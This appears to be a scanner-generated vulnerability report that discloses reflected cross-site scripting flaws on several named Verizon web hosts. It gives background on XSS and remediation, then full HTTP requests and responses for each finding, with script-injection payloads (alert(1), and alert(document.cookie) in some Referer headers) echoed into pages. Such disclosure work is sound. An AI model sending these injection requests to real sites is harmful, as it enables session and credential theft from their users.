CWE-79, XSS, Multiple Verizon Web Properties | Vulnerability Crawler

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://media.verizon.com/media/scripts/widget.ashx [container parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/scripts/widget.ashx

Issue detail

The value of the container request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734b4"%3balert(1)//ffdbbd18438 was submitted in the container parameter. This input was echoed as 734b4";alert(1)//ffdbbd18438 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/scripts/widget.ashx?widget=vzNews&container=vzNewsWidget734b4"%3balert(1)//ffdbbd18438 HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcement&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; RegistrationApp=SessionId=a4070464-e820-4c26-81ff-bff2c6dfeb5b; VZGEO=west; vzAppID=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Date: Mon, 13 Dec 2010 01:24:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; domain=verizon.com; expires=Wed, 15-Dec-2010 01:24:47 GMT; path=/
Content-Length: 139110

/* widget.ashx code generated : 12/13/2010 1:24:47 AM; valid until: 12/12/2010 7:35:13 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = false;

/* files consolida
...[SNIP]...
</script>";
jQuery("#vzNewsWidget734b4";alert(1)//ffdbbd18438").html( ctrl );
});

jQuery.noConflict();

1.2. http://media.verizon.com/media/scripts/widget.ashx [widget parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/scripts/widget.ashx

Issue detail

The value of the widget request parameter is copied into the HTML document as plain text between tags. The payload 29aa7<script>alert(1)</script>8172aa984f3 was submitted in the widget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/scripts/widget.ashx?widget=vzNews29aa7<script>alert(1)</script>8172aa984f3&container=vzNewsWidget HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcement&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; RegistrationApp=SessionId=a4070464-e820-4c26-81ff-bff2c6dfeb5b; VZGEO=west; vzAppID=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 377
Date: Mon, 13 Dec 2010 01:24:54 GMT
Connection: close
Vary: Accept-Encoding

/* could not complete request : System.Exception: No configuration is available for the requested widget (vzNews29aa7<script>alert(1)</script>8172aa984f3).
at WidgetHandler.get_Arguments() in d:\WWW\Media.verizon.net\media\Scripts\widget.ashx:line 36
at WidgetHandler.ProcessRequest(HttpContext context) in d:\WWW\Media.verizon.net\media\Scripts\
...[SNIP]...

1.3. http://products.verizonwireless.com/index.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://products.verizonwireless.com
Path:	/index.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42efd'-alert(1)-'c7286b8816d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.aspx?42efd'-alert(1)-'c7286b8816d=1 HTTP/1.1
Host: products.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 13 Dec 2010 01:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ig45msbtps2or355o0a22nq5; path=/; HttpOnly
Content-Length: 54980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Entertain
...[SNIP]...
ireless.com/accessmanager/logout.aspx");
       hightlightMenu(1,2);
   }
   var loggedInURL = "https://login.verizonwireless.com/amserver/UI/Login";
   goto = 'http://products.verizonwireless.com/index.aspx?42efd'-alert(1)-'c7286b8816d=1';
   var gnCategory=3;
</script>
...[SNIP]...

1.4. http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/images/vz_uploads/verizon_cr_report_2009-2010.pdf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bbfd<script>alert(1)</script>116dd6ba7eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images1bbfd<script>alert(1)</script>116dd6ba7eb/vz_uploads/verizon_cr_report_2009-2010.pdf HTTP/1.1
Host: responsibility.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:10:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_visit=976871437; expires=Tue, 13-Dec-2011 01:10:37 GMT; path=/
Set-Cookie: exp_last_activity=1292231437; expires=Tue, 13-Dec-2011 01:10:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:10:38 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 111094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/images1bbfd<script>alert(1)</script>116dd6ba7eb/vz_uploads/verizon_cr_report_2009-2010.pdf</strong>
...[SNIP]...

1.5. http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/images/vz_uploads/verizon_cr_report_2009-2010.pdf

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c103b<script>alert(1)</script>f9dc8cf463f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/vz_uploadsc103b<script>alert(1)</script>f9dc8cf463f/verizon_cr_report_2009-2010.pdf HTTP/1.1
Host: responsibility.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:10:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_visit=976871440; expires=Tue, 13-Dec-2011 01:10:40 GMT; path=/
Set-Cookie: exp_last_activity=1292231440; expires=Tue, 13-Dec-2011 01:10:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:10:41 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/images/vz_uploadsc103b<script>alert(1)</script>f9dc8cf463f/verizon_cr_report_2009-2010.pdf</strong>
...[SNIP]...

1.6. http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/images/vz_uploads/verizon_cr_report_2009-2010.pdf

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee0a6<script>alert(1)</script>a6111243118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6<script>alert(1)</script>a6111243118 HTTP/1.1
Host: responsibility.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:10:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_visit=976871442; expires=Tue, 13-Dec-2011 01:10:42 GMT; path=/
Set-Cookie: exp_last_activity=1292231442; expires=Tue, 13-Dec-2011 01:10:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:10:43 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6<script>alert(1)</script>a6111243118</strong>
...[SNIP]...

1.7. http://responsibility.verizon.com/persepolis/template_files/embeds/js_aci_scripts.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_aci_scripts.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ffad<script>alert(1)</script>2016db4ecec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis2ffad<script>alert(1)</script>2016db4ecec/template_files/embeds/js_aci_scripts.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232326; expires=Tue, 13-Dec-2011 01:25:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:27 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis2ffad<script>alert(1)</script>2016db4ecec/template_files/embeds/js_aci_scripts.js</strong>
...[SNIP]...

1.8. http://responsibility.verizon.com/persepolis/template_files/embeds/js_aci_scripts.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_aci_scripts.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2d496<script>alert(1)</script>ebafe395bb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_files2d496<script>alert(1)</script>ebafe395bb3/embeds/js_aci_scripts.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232328; expires=Tue, 13-Dec-2011 01:25:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:29 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_files2d496<script>alert(1)</script>ebafe395bb3/embeds/js_aci_scripts.js</strong>
...[SNIP]...

1.9. http://responsibility.verizon.com/persepolis/template_files/embeds/js_aci_scripts.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_aci_scripts.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e503<script>alert(1)</script>58e4d016679 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_files/embeds3e503<script>alert(1)</script>58e4d016679/js_aci_scripts.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232331; expires=Tue, 13-Dec-2011 01:25:31 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:31 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_files/embeds3e503<script>alert(1)</script>58e4d016679/js_aci_scripts.js</strong>
...[SNIP]...

1.10. http://responsibility.verizon.com/persepolis/template_files/embeds/js_aci_scripts.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_aci_scripts.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6e68<script>alert(1)</script>781165d3d32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_files/embeds/js_aci_scripts.jse6e68<script>alert(1)</script>781165d3d32 HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232333; expires=Tue, 13-Dec-2011 01:25:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:34 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_files/embeds/js_aci_scripts.jse6e68<script>alert(1)</script>781165d3d32</strong>
...[SNIP]...

1.11. http://responsibility.verizon.com/persepolis/template_files/embeds/js_slidingpanels_spry.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_slidingpanels_spry.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6db3<script>alert(1)</script>3e9ba843229 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolisc6db3<script>alert(1)</script>3e9ba843229/template_files/embeds/js_slidingpanels_spry.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232326; expires=Tue, 13-Dec-2011 01:25:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:27 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolisc6db3<script>alert(1)</script>3e9ba843229/template_files/embeds/js_slidingpanels_spry.js</strong>
...[SNIP]...

1.12. http://responsibility.verizon.com/persepolis/template_files/embeds/js_slidingpanels_spry.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_slidingpanels_spry.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc7cd<script>alert(1)</script>9cc0e2c7e09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_filesbc7cd<script>alert(1)</script>9cc0e2c7e09/embeds/js_slidingpanels_spry.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
